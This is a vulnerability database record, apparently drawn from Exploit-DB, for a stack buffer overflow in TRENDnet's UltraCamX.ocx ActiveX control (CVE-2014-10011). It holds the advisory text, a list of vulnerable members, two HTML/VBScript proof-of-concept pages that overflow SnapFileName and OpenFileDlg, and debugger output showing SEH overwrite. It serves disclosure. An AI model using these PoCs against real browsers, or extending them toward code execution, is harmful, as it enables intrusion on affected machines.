ID

VAR-E-201411-0424


CVE

cve_id:CVE-2014-10011

Trust: 1.9

sources: BID: 71292 // EXPLOIT-DB: 35363 // EDBNET: 56561

EDB ID

35363


TITLE

TRENDnet SecurView Wireless Network Camera TV-IP422WN - 'UltraCamX.ocx' Stack Buffer Overflow (PoC) - Windows dos Exploit

Trust: 0.6

sources: EXPLOIT-DB: 35363

DESCRIPTION

TRENDnet SecurView Wireless Network Camera TV-IP422WN - 'UltraCamX.ocx' Stack Buffer Overflow (PoC). CVE-115037CVE-2014-10011 . dos exploit for Windows platform

Trust: 0.6

sources: EXPLOIT-DB: 35363

AFFECTED PRODUCTS

vendor:trendnetmodel:securview wireless network camera tv-ip422wnscope: - version: -

Trust: 1.0

vendor:trendnetmodel:tv-ip422wnscope:eqversion:0

Trust: 0.3

sources: BID: 71292 // EXPLOIT-DB: 35363

EXPLOIT


TRENDnet SecurView Wireless Network Camera TV-IP422WN (UltraCamX.ocx) Stack BoF

Vendor: TRENDnet
Product web page: http://www.trendnet.com
Affected version: TV-IP422WN/TV-IP422W

Summary: SecurView Wireless N Day/Night Pan/Tilt Internet Camera, a powerful
dual-codec wireless network camera with the 2-way audio function that provides
the high-quality image and on-the-spot audio via the Internet connection.

Desc: The UltraCam ActiveX Control 'UltraCamX.ocx' suffers from a stack buffer
overflow vulnerability when parsing large amount of bytes to several functions
in UltraCamLib, resulting in memory corruption overwriting severeal registers
including the SEH. An attacker can gain access to the system of the affected
node and execute arbitrary code.

-----------------------------------------------------------------------------

0:000> r
eax=41414141 ebx=100ceff4 ecx=0042df38 edx=00487900 esi=00487a1c edi=0042e9fc
eip=100203fb esp=0042d720 ebp=0042e9a8 iopl=0 nv up ei pl nz ac po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210212
UltraCamX!DllUnregisterServer+0xeb2b:
100203fb 8b48e0 mov ecx,dword ptr [eax-20h] ds:002b:41414121=????????
0:000> !exchain
0042eda8: 41414141
Invalid exception stack at 41414141

-----------------------------------------------------------------------------

Tested on: Microsoft Windows 7 Professional SP1 (EN)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience

Advisory ID: ZSL-2014-5211
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5211.php

16.11.2014

---

Properties:
-----------

FileDescription UltraCam ActiveX Control
FileVersion 1, 1, 52, 16
InternalName UltraCamX
OriginalFileName UltraCamX.ocx
ProductName UltraCam device ActiveX Control
ProductVersion 1, 1, 52, 16

List of members:
----------------

Interface IUltraCamX : IDispatch
Default Interface: True
Members : 62
RemoteHost
RemotePort
AccountCode
GetConfigValue
SetConfigValue
SetCGIAPNAME
Password
UserName
fChgImageSize
ImgWidth
ImgHeight
SnapFileName
AVIRecStart
SetImgScale
OpenFolder
OpenFileDlg
TriggerStatus
AVIRecStatus
Event_Frame
PlayVideo
SetAutoScale
Event_Signal
WavPlay
CGI_ParamGet
CGI_ParamSet
MulticastEnable
MulticastStatus
SetPTUserAllow

Vulnerable members of the class:
--------------------------------

CGI_ParamSet
OpenFileDlg
SnapFileName
Password
SetCGIAPNAME
AccountCode
RemoteHost

PoC(s):
-------

<html>
<object classid='clsid:E1B26101-23FB-4855-9171-F79F29CC7728' id='target' />
<script language='vbscript'>
targetFile = "C:\Windows\Downloaded Program Files\UltraCamX.ocx"
prototype = "Property Let SnapFileName As String"
memberName = "SnapFileName"
progid = "UltraCamLib.UltraCamX"
argCount = 1

thricer=String(8212, "A")

target.SnapFileName = thricer

</script>
</html>

--

eax=41414141 ebx=00809590 ecx=41414141 edx=031e520f esi=0080c4d4 edi=00000009
eip=1002228c esp=003befb4 ebp=003befbc iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206
UltraCamX!DllUnregisterServer+0x109bc:
1002228c 0fb64861 movzx ecx,byte ptr [eax+61h] ds:002b:414141a2=??

--

<html>
<object classid='clsid:E1B26101-23FB-4855-9171-F79F29CC7728' id='target' />
<script language='vbscript'>
targetFile = "C:\Windows\Downloaded Program Files\UltraCamX.ocx"
prototype = "Function OpenFileDlg ( ByVal sFilter As String ) As String"
memberName = "OpenFileDlg"
progid = "UltraCamLib.UltraCamX"
argCount = 1

thricer=String(2068, "A")

target.OpenFileDlg thricer

</script>
</html>

--

0:000> r
eax=41414141 ebx=100ceff4 ecx=0042df38 edx=00487900 esi=00487a1c edi=0042e9fc
eip=100203fb esp=0042d720 ebp=0042e9a8 iopl=0 nv up ei pl nz ac po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210212
UltraCamX!DllUnregisterServer+0xeb2b:
100203fb 8b48e0 mov ecx,dword ptr [eax-20h] ds:002b:41414121=????????
0:000> !exchain
0042eda8: 41414141
Invalid exception stack at 41414141

--

Trust: 1.0

sources: EXPLOIT-DB: 35363

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 35363

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 35363

TYPE

'UltraCamX.ocx' Stack Buffer Overflow (PoC)

Trust: 1.0

sources: EXPLOIT-DB: 35363

CREDITS

LiquidWorm

Trust: 0.6

sources: EXPLOIT-DB: 35363

EXTERNAL IDS

db:ZSLid:ZSL-2014-5211

Trust: 2.5

db:NVDid:CVE-2014-10011

Trust: 1.9

db:EXPLOIT-DBid:35363

Trust: 1.6

db:EDBNETid:79604

Trust: 0.6

db:EDBNETid:56561

Trust: 0.6

db:BIDid:71292

Trust: 0.3

sources: BID: 71292 // EXPLOIT-DB: 35363 // EDBNET: 79604 // EDBNET: 56561

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2014-10011

Trust: 1.6

url:http://www.zeroscience.mk/en/vulnerabilities/zsl-2014-5211.php

Trust: 1.3

url:https://www.intelligentexploit.com

Trust: 0.6

url:https://www.exploit-db.com/exploits/35363/

Trust: 0.6

url:http://www.trendnet.com/

Trust: 0.3

sources: BID: 71292 // EXPLOIT-DB: 35363 // EDBNET: 79604 // EDBNET: 56561

SOURCES

db:BIDid:71292
db:EXPLOIT-DBid:35363
db:EDBNETid:79604
db:EDBNETid:56561

LAST UPDATE DATE

2022-07-27T09:54:16.171000+00:00


SOURCES UPDATE DATE

db:BIDid:71292date:2015-04-13T21:01:00

SOURCES RELEASE DATE

db:BIDid:71292date:2014-11-25T00:00:00
db:EXPLOIT-DBid:35363date:2014-11-25T00:00:00
db:EDBNETid:79604date:2014-11-25T00:00:00
db:EDBNETid:56561date:2014-11-25T00:00:00